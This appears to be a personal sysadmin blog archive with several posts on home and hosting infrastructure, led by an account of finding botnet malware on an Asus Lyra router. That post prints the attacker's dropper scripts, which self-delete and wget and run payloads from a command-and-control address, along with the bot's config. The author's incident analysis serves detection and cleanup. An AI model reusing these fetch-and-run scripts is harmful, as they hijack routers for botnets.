All posts by admin

Routers are secure, right? Asus Lyra hacked.

We take the small things for granted in life.
Like, say breathing. Or, the security on our embedded network devices…

As our devices become more and more complicated and sophisticated, we use them in the hope that so are their security features become more advanced at the same time.
Sure, sometimes we’ll be okay, but other times, we are at risk of getting caught out by poor security defaults and lack of user education, which can cause a nightmare in the world of “Always on” and internet connected everything.

While staying with family in the middle of a word-wide pandemic (thanks Covid-19), I was messing around with their Asus Lyra I’d given them a while back.
Its a great, and powerful ARM + Linux based WiFi mesh system with plenty of features to explore, and its a power-users near perfect setup, while still being somewhat user friendly.

Lyra | Networking | ASUS Global
Asus Lyra

Bad Sign #1.

So, every once in a while, the main mesh node, I’ll say “router” here as its the node connected to the internet gateway, seemed to lock up and die. I’d seen this first hand, and considered if there was a hardware problem that could be unique to the main node. The lights are on, but there is no one home. All internet connectivity dies, and a reboot is required to get anything working again. All the other nodes in the mesh flash a red status light, indicating a mesh failure, yet the main node still shows a healthy-blue, yet it remains totally locked up and inaccessible via either LAN cable or WiFi of the other nodes.

All of the other Lyra deployments I have used before, of the exact same model, work perfectly and I’ve never really faced this kind of problem before. The system has the tenancy to “just work”.
Just before the death of the main node, things would seem slow and sluggish for internet users. Packet-loss would creep up, and if left long enough, the main node would die totally.
Once the main node would be rebooted, each other Lyra node needed a manual reboot too in order to rejoin the mesh (again, not something I’ve experienced on other Lyra systems I used previously).

During the “build up” in packet-loss before the node died, I did on occasion note a higher than expected memory usage if I checked the web interface, which I half-ass attributed to some of the extra features of the Lyra running in the background.

Bad Sign #2.

In this location, a Ring door-bell and camera system is deployed. Its a handy little WiFi connected camera system that allows you to check up who is knockin’.

Some time ago, we noticed when trying to use either the Ring app, or even the Ring website, you’d get a straight blocked message, or, the app would mention there was a network problem.
I had provided evidence to Ring Support that there was a problem on their side, and that they had been blocking our access to this fancy tech they’ve sold us at a premium.

Sadly, the first consultant was in way over his head. Then the second “escalation” consultant was arguably even worse, although they at least requested screenshots of the issue via email, which was ultimately ignored anyway.

Visiting ring.com would produce a 406 Not Acceptable

After not being able to get anything productive out of them, being pushed agent to agent, we gave up trying, and I suggested my family ask their ISP for a new static-ip address.

The discovery!

Jump forward 100 or-so days of lock-down, I decided to try my hand at getting the Lyra to auto-reboot on a schedule. My plan was that if it rebooted often, perhaps it wouldn’t lock up on the odd occasion. I was spurred on by the fact that it runs Linux, and presents an SSH connection. You can do ANYTHING on Linux! Right?

Logging in and stumbling around, I noticed there was a very small /jffs partition with the only files that persist a reboot. This was mainly used for security signature versions, DHCP configs, boring stuff. However, there was a sub-directory called “Scripts”. Perfect!

Googling this device, I tried some user-script options that are included with the Asuswrt-Merlin packages, but thats a custom spin on the official Asus firmware, which doesn’t support the Lyra.

Any files I created within the /jffs/scripts/ directory didn’t do anything, and it seemed like that might be a dead end.

I decided to take a look into the only file I found by default in this directory, I noticed it had the full path “/jffs/scripts/openvpn-event”.
Checking the content, something didn’t seem right… This is a weird way for OpenVPN to do something. Plus, it isn’t even configured!

!/bin/sh
cd /tmp
cp /jffs/runtime.log upgrade.sh
sh upgrade.sh &

Looks innocent on the first look, but, why does a log file later become upgrade.sh…?
When checking /jffs/runtime.log, I start to worry:

!/bin/sh
rm $0
if [ ps|grep upgrade.sh|wc -l -gt 3 ]; then
exit
fi
sleep 120
cd /tmp
wget --no-check-certificate https://IP_FROM_INDONESIA/314/o2.sh -O /tmp/chkupdate.sh
sh /tmp/chkupdate.sh &

I’m no security expert, but having worked at a fair few shared hosting companies, I know when a Linux script looks a little dodgy. Since by now we’re getting super dodgy, I’m going deeper, /tmp/chkupdate.sh:

!/bin/sh
rm $0
cd /tmp
wget --no-check-certificate https://IP_FROM_INDONESIA/as/as.armv5te -O /tmp/update
wget --no-check-certificate https://IP_FROM_INDONESIA/314/.update5.log -O /tmp/.update.log
chmod 777 /tmp/update
/tmp/update &

/tmp/update is obsficated or compiled, so I can’t read it, but .update.log:

IP_FROM_INDONESIA
443
/314/check5.php
/tmp/stop.txt
43200
60
1

Well, hell. We’re hacked, folks!
I noticed the structure of this file looked a bit like another URL, so I built a web call out of this file so I can grab check5.php from the bot-command and control server, and I got this basic file, I guess they don’t want to attack anyone right now:

rm $0
sleep 10

Are we actively hacked though? Are these scripts running?
Checking the basic netstat output provided with the BusyBox shell, I don’t see any open ports I don’t know.

But, while checking the ps output of the system, I can see “update” is running, and continues to loop the file above. Without strace, its hard to tell what exactly is going on…
Great! But what gives, I cant find any signs of how the attacker even managed to run a custom script at all, let alone an elaborate bot! I was trying to do this very thing myself.

A little googling later, and I found an nvram option on the Lyra. Here is where important configs are saved and persisted on reboots. The one in interest was a previously unknown option to me, jffs2_scripts:

# nvram get jffs2_scripts
1

And here was where you set your custom script that will execute on a reboot:

# nvram show |grep script
size: 31964 bytes (29476 left)
jffs2_exec=sh /jffs/scripts/openvpn-event
script_usbhotplug=
script_usbmount=
jffs2_scripts=1
script_usbumount=

Got ya!

I notice the usb options here too, I had previously seen a dirty hack option to inject a script on reboot by making use of a USB port on the router, but that was far too disgusting to even consider. The idea of having to plug in a USB device on each reboot didn’t sound like a good idea.

So, how did this happen?

Its not clear! The logs don’t persist for very long, and are cycled on every reboot. Looking at the dates on the files, /jffs/scripts/openvpn-event had a create date of November 2019, which could be easily faked, but did like a logical possible date of entry for a hacker.
Sadly, no logs persisted long enough to get close to reveling the source of intrusion, but it might not be of much value anyway.

My current deduction is that sometime between now and November, likely on setup of the device, perhaps the default password was in use and the firewall was not toggled, allowing for an easy entry via the SSH service running on the device.

If this poor router had been used in DDOS attacks like a brainless zombie roaming the internet, its no wonder poor Ring had decided to take a break from talking to us for a while.

Update – 19/08/20
In-case it isn’t clear what to do in this kinda situation, do a factory reboot of your Asus Lyra if you believe it was hacked, or even go as far as downloading a re-flashing firmware from Asus directly. Having spent a few days trying to clean up the infection, I find more and more firewall rules blocking updates and other strange things. Just reset it! šŸ™‚

FakeRAID, Linux, and R1Soft

FakeRAID and Linux aren’t really friends.

What is fakeRAID?
In the last few years, a number of hardware products have come onto the market claiming to be IDE or SATA RAID controllers. These have shown up in a number of desktop/workstation motherboards and lower-end servers. Virtually none of these are true hardware RAID controllers. Instead, they are simply multi-channel disk controllers combined with special BIOS configuration options and software drivers to assist the OS in performing RAID operations. This gives the appearance of a hardware RAID, because the RAID configuration is done using a BIOS setup screen, and the operating system can be booted from the RAID. With the advent of Terabyte disk drives, FakeRAID is becoming a popular option for entry-level small business servers to simply mirror 2 1.5 TB drives, and dispense with an expensive hardware RAID 5 array.

Older Windows versions required a driver loaded during the Windows install process for these cards, but that is changing. Under Linux, which has built-in softRAID functionality that pre-dates these devices, the hardware is normally seen for what it is — multiple hard drives and a multi-channel IDE/SATA controller. Hence, fakeRAID.

Source: https://help.ubuntu.com/community/FakeRaidHowto

As above, normally in Linux your BIOS RAID can’t be seen, you’ll rather have your normal /dev/sd[abc] disks, which proves challenging.

Historically, there has been no need to use the BIOS RAID with Linux, MDADM has done a good enough, or even better job, that is, until a unique use-case came up.

R1Soft by Idera provides file-level and block-level backups via their software. It works rather well, and has a bare-metal agent to boot into when you run into a rock and need your data for some reason.
We wanted to test a restore of a physical Windows server, which is normally just 2 x 1TB disks in a software RAID 1 mirror, and would be easy enough to do, boot to the rescue restore CD, point to a disk, and shoot, then just re-add your second disk to the RAID, but in this case, the client had 3 x 1TB disks in RAID 5, so a single disk restore wasn’t an option.

We needed the FakeRAID to hand over a 1.8TB disk to the restore agent in order to send over the data, and Linux doesn’t see our FakeRAID. An easy fix would be to slot in a RAID card, or, a single 2TB disk for the sake of the restore, but, Douglas said half-jobs are bad.

“Paul Marrapese” wrote a great article “Arch Linux and Intel RST (ā€œFake RAIDā€)
In the article, he writes about creating your raid in Linux by telling MDADM to use external metadata, and that actually works perfectly, the RAID is even detected by the RST BIOS ROM, but in the Ubuntu rescue CD, it was totally unusable. The RAID remained resync pending, and read-only. Nothing I could think of could get the raid r/w.

I blame the Ubuntu version the CD is running, the modules compiled with it, or something.

Moving on, booting into a CentOS 7 Live Rescue, it detects and starts the RAID volume and even starts the resync without any prompt, and read/write. So we’re gonna need to find a way to do it from here.

FakeRAID seems to work out the box with CentOS 7’s rescue environment!

YUM isn’t really usable on the live ISO, so I installing the R1 Agent here isn’t really an option.
I decided to mount my CD to the second media port via the BMC on the server, and get a CHROOT into the rescue CD. That worked, and my R1 Agent could start, but a CD is read-only, so services couldn’t start correctly, so this wasn’t gonna work.
How did they get the system rw on the bootable restore? Let’s go back and see:

Here we see our root volume is overlayfs, WTF is that?!

OverlayFS provides a great way to merge directories or filesystems such that one of the filesystems (called the “lower” one) never gets written to, but all changes are made to the “upper” one. This is great for systems that rely on having read-only data, but the view needs to be editable, such as Live CD’s and Docker containers/images (image is read only). This also allows you to quickly add some storage to an existing filesystem that is running out of space, without having to alter any structures. It could also be a useful component of a backup/snapshot system.

https://blog.programster.org/overlayfs

Right, that makes perfect sense! You have a read-only volume, and a scratch area, where all the differencing is saved. Above, we see the the cd on /dev/loop0 is moutned to /rofs, read only. Magic?

Lets get back to CentOS then and see if we can make this work. An example on the link above shows how we can get it going:

Mount it!

Once our filesystem is read-write, we do the usual mounting of sys, proc and dev, then we chroot into our rw filesystem, configure our IP addresses, and start the CDP agent.

Yay!

Now we get back to R1Soft’s web UI, point to our agent, restore partitions to the FakeRAID, and run the restore.

Job done.

Linux Raid Mdadm lockout.

MDADM – Meta Device Admin. Apparently.

Sometimes, you wanna trash your RAID. But Linux starts it up while you’re not looking, and locks your block devices.

In a terminal, lets break it.
sudo -i
Here we become root, not user.

cat /proc/mdstat
Here, we can see our RAID devices that are started. eg, md126 md127 etc.

mdadm –manage –stop /dev/md127
Here, we manage the device, and use the stop flag, telling MDADM to stop the raid device. With this done, now we can work on the underlying disks. You’ll need to do this for each raid device.

Have fun.

CPanel NGINX hack-mirror, sometimes breaks

We had a few clients complaining about corrupted downloads from our mirror when trying to run upcp CPanel update, so I checked it out.

It looks like the NGINX Proxy Cache had corruption, and it had a file “http://cpproxy.afrixx.com/cpanelsync/11.68.0.26/binaries/linux-c7-x86_64/bin/setsiteip.xz” that was invalid, and corrupted based on the expected checksum.

I’ve double checked the health of the cpproxy, and it seems okay, although it was rebooted recently, I am not sure if I was not the first one to look at the issue.
I can see from the logs, we served him a cached “HIT” to the clients box.

15x.0.165.4 – – [18/Jan/2018:00:52:27 +0200] “GET /cpanelsync/11.68.0.26/binaries/linux-c7-x86_64/bin/setsiteip.xz HTTP/1.1” 200 1026207 “-” “HTTP-Tiny/0.068” “-” “Cache-Status:HIT”
There were 10 attempts from his box, as well as some others from other boxes at the time.

We last “missed” an attempt to get this file at the following date:
access.log-20180116.gz:15x.0.160.155 – – [16/Jan/2018:01:32:08 +0200] “GET /cpanelsync/11.66.0.34/binaries/linux-c7-x86_64/bin/setsiteip.xz HTTP/1.1” 200 2122005 “-” “HTTP-Tiny/0.068” “-” “Cache-Status:MISS”

At this point we could assume it was cached on this MISS.
This means anyone wanting to do an UPCP though the proxy since this date would be sad.

I have taken the exact file the client complained about, and checked if the cache has expired and redownloaded the file.

I downloaded our cache’s file to “CACHE”:
root@alyx:~/cp# wget -O CACHE http://cpproxy.afrixx.com/cpanelsync/11.68.0.26/binaries/linux-c7-x86_64/bin/setsiteip.xz
–2018-01-18 22:42:32– http://cpproxy.afrixx.com/cpanelsync/11.68.0.26/binaries/linux-c7-x86_64/bin/setsiteip.xz
Resolving cpproxy.afrixx.com (cpproxy.afrixx.com)… 1xx.242.144.85
Connecting to cpproxy.afrixx.com (cpproxy.afrixx.com)|1xx.242.144.85|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: unspecified [application/x-xz]
Saving to: ā€˜CACHE’

CACHE [ <=> ] 1.32M –.-KB/s in 0.07s

2018-01-18 22:42:32 (19.1 MB/s) – ā€˜CACHE’ saved [1383264]

And I downloaded the CPANEL Mirror’s version to NON-CACHE:

root@alyx:~/cp# wget -O NON-CACHE http://httpupdate.cpanel.net/cpanelsync/11.68.0.26/binaries/linux-c7-x86_64/bin/setsiteip.xz
–2018-01-18 22:42:52– http://httpupdate.cpanel.net/cpanelsync/11.68.0.26/binaries/linux-c7-x86_64/bin/setsiteip.xz
Resolving httpupdate.cpanel.net (httpupdate.cpanel.net)… 67.159.2.2, 67.205.110.4, 208.109.109.239, …
Connecting to httpupdate.cpanel.net (httpupdate.cpanel.net)|67.159.2.2|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: unspecified [application/x-xz]
Saving to: ā€˜NON-CACHE’

NON-CACHE [ <=> ] 1.32M 871KB/s in 1.6s

2018-01-18 22:42:54 (871 KB/s) – ā€˜NON-CACHE’ saved [1383264]

When we compare the files md5 checksum, I can see the files are the same:

root@alyx:~/cp# md5sum NON-CACHE
401dbed2bd9075e2896e596738163437 NON-CACHE
root@alyx:~/cp# md5sum CACHE
401dbed2bd9075e2896e596738163437 CACHE

I’ve also run an upcp on a different box that is pointing to our cache, and it seems to be fine.

I’ll assume the cache expired and the file rotated, clearing the error condition.

Mew

VMWare and Bonding…

So, I have a little home VMWare stack at home, 2 x physical systems with 2 x 1gbps eth each…

I configured the ports as LACP LAGs, for MAOR BANDWIF. And because I have a switch that can do it so why not?

I had previously setup my NICs on the VMWare side as follows:
Yet, something wasnt quite correct. These LAGs were set as uplinks for the switch, but if I were to ping something in my home, say a gateway, I would get DUPs:
===
64 bytes from 192.168.1.1: icmp_seq=1736 ttl=64 time=0.268 ms
64 bytes from 192.168.1.1: icmp_seq=1736 ttl=64 time=0.281 ms (DUP!)
64 bytes from 192.168.1.1: icmp_seq=1737 ttl=64 time=0.361 ms
64 bytes from 192.168.1.1: icmp_seq=1737 ttl=64 time=0.376 ms (DUP!)
===

This was strange. I ignored it for a little. Then when trying to work on another project I was getting packet issues talking to a VM, and I got annoyed. I spent a good hour trying to stumble around the VMWare WEB UI, which I thought was hiding the answers I seek.

After a while I decided to check the switch rather. Perhaps something isn’t quite correct there? AHA!
A dump of the active LAGs on my Extreme is:

And there it is, Trunk group 1 had only 1 x member, leaving the other to just act as another access port.
A quick fixie:

And we could see straight away, that all was good:
64 bytes from 192.168.1.1: icmp_seq=1741 ttl=64 time=0.405 ms (DUP!)
64 bytes from 192.168.1.1: icmp_seq=1742 ttl=64 time=0.372 ms
64 bytes from 192.168.1.1: icmp_seq=1742 ttl=64 time=0.394 ms (DUP!)
64 bytes from 192.168.1.1: icmp_seq=1743 ttl=64 time=0.343 ms
64 bytes from 192.168.1.1: icmp_seq=1743 ttl=64 time=0.403 ms (DUP!)
64 bytes from 192.168.1.1: icmp_seq=1744 ttl=64 time=0.454 ms
64 bytes from 192.168.1.1: icmp_seq=1745 ttl=64 time=0.279 ms
64 bytes from 192.168.1.1: icmp_seq=1746 ttl=64 time=0.355 ms
64 bytes from 192.168.1.1: icmp_seq=1747 ttl=64 time=0.318 ms

rAge Cape Town 2016


So, with the event fast approaching, planning is well under way for rAge Cape Town 2016.

Sadly since the event is fairlyĀ small this year, with only a few hundred gamers, which means there is a limited budget. This is still okay, I will be paying my way and heading down to join the set-up on the 17th.

Again, Intel has sent over some amazing servers for the event.
They sent over 2 x Boxes for the cache setup, each of them have:
2 x E5-2690v2 @ 3.00GHz
20 cores and 40 threads
50MB of L3 cache
5MB of L2 cache
1.3MB of L1 cache
192GB of RAM, for a real nice hot cache.
2.5TB of SSDs, in RAID0.
At least 7 x 1GBps NICs
We can change the config as desired….

Looking at last years specs, it looks like the set-up is actually the same, but with more SSDs

I am waiting to see what IS will be bringing to the party for an Internet Connection, but I am sure it will be something exciting.

Pics and more info to follow šŸ™‚

SERIAL KILLER

A long while back, a friend of mine gave me a 24 Port 10/100 3COM switch.
It was quite nice of him, but I couldn’t get access to this switch.

It had a management port on it, so I had to go out and buy a NULL-MODEM adapter to use it.

It looks just like this:


And alas, I was able to gain access to the switch and reset it, so I could get into its Web UI.

I got over this switch very shortly afterwards, it was only 10/100 so I put it aside.

Here we are 2 or so years later, and I am donated a massive load of Servers + Switches from an old Call Center.
Its really enterprise grade stuff.

I found myself doing a scan of 10.0.0.0/8 trying to get into the switches again, and came short.

Off to the old draws to find the handy NULL-MODEM hackĀ connection, and we have a winner! Default password too.

However these switches aren’t so easy, and most commands have to be done via the CLI. Which is amazing. I do not know the link between ExtemeNetworking and Cisco, but they are VERY similar.

These switches will help with my CCNA!
I plan to add a lot more stuff once I get up and running with the rest of the hardware we now have. We have over 10 new servers to play with!

VLAN much?

So, in my own setup at home, I had alot of physical stuff.

I had 1 x PC with PFSense, and that had 3 x NICs.
Then I have 1 x NAS server with a few drives in it, running FreeNAS.
And a VMWare host runing ESXi, for small projects.

So I took the PFsense and put it on the ESXi host, which got rid of some of the hardware I had to have sitting around, but this created a problem on its own.

I have 2 x ADSL routers, and I need to do a PPPOE out of each.
I have to dial out of each, and try to separate them somehow, so that PFSense doesn’t do 2 x PPPOE connections through the same router.

And after a weekend of Googling, blood, tears, etc, I got it right.

In VSphere, I created a VLAN for the WAN interface the PFSense box will use, and added this to VLAN 4095, so it was able to be in whatever VLAN it wanted.

Then I was able to create 2 VLAN interfaces inside PFSense. VLAN 2 and VLAN 3.
These were then set-up on my managed switch, and I added with ports of the ADSL routers to this VLAN, so that they were able to talk to VLAN 2 and 3 respectively.

This seemed to work, and the PFSense was now able to talk to the Router in if own VLAN.

Then in PFSense, we just added the PPPOE and told it to dial over the VLAN, so that it wouldn’t get mixed up with the other modem, and boom. Done!

The most complicated part was trying to work out how to setup my managed switch, its VLAN setup confused me with its tagging setup etc, but I was eventually able to figure it out, and it all works in pure harmony šŸ™‚

WAIT!

Who wants to wait around for other people/things?

Defiantly not your cache server, and if it is waiting around, then there could be a problem somewhere.

See my case below:system1z.1daykern1z.1day
The server has only 4 CPUs, and its load average is almost double that.
Wow, why is there so much work happening on the CPU? What is could it be processing that is causing such high load?

Nothing. The Answer is ZERO.
It isn’t doing a thing, but it is rather, waiting.

If you take a look at the Kernal Usage graph, we see that we are waiting. A lot. This is due to the disks in this high-demand cache really not being able to fit the load its expected to do, serve a lot of content to a country of users.

Poor thing.

As it stands this box has 3 x 3TB Drives in it. Striped for ghaddagofast speeds. But it still isn’t enough. It would seem like the actual transfer rates are okay, and don’t seem to be a bottleneck, but rather the IOps they are expected to be able to serve.

This problem could be EASILY solved with 1 x SSD. Seriously easily, and a little $$.
But $$ isn’t always on your side. People like their $$$.

So we have to use what is around, which in this case is alot of servers and magnetic drives.

Cool, we can just pop some more HDDs into the server, cant we?
Wrong.

The server is 1U big with 3 bays as is. There is no space.

So now, we plan stuff. We need to make a plan. Or we scrap the project.

So we get 2 x of the Old servers.
These can take 3 x Drives each. We populate the bays.

We then install FreeNAS, because I quite enjoy using it and it sends me emails, which I quite like.
It also supports iSCSI, which we plan to use to share the drives over 2 x 1Gbps NICs.

iSCSI, which stands for Internet Small Computer System Interface, works on top of the Transport Control Protocol (TCP) and allows the SCSI command to be sent end-to-end over local-area networks (LANs), wide-area networks (WANs) or the Internet.

Will it work? I hope so. If it doesnt work after this, that really is kinda sucky.

Time will tell, right?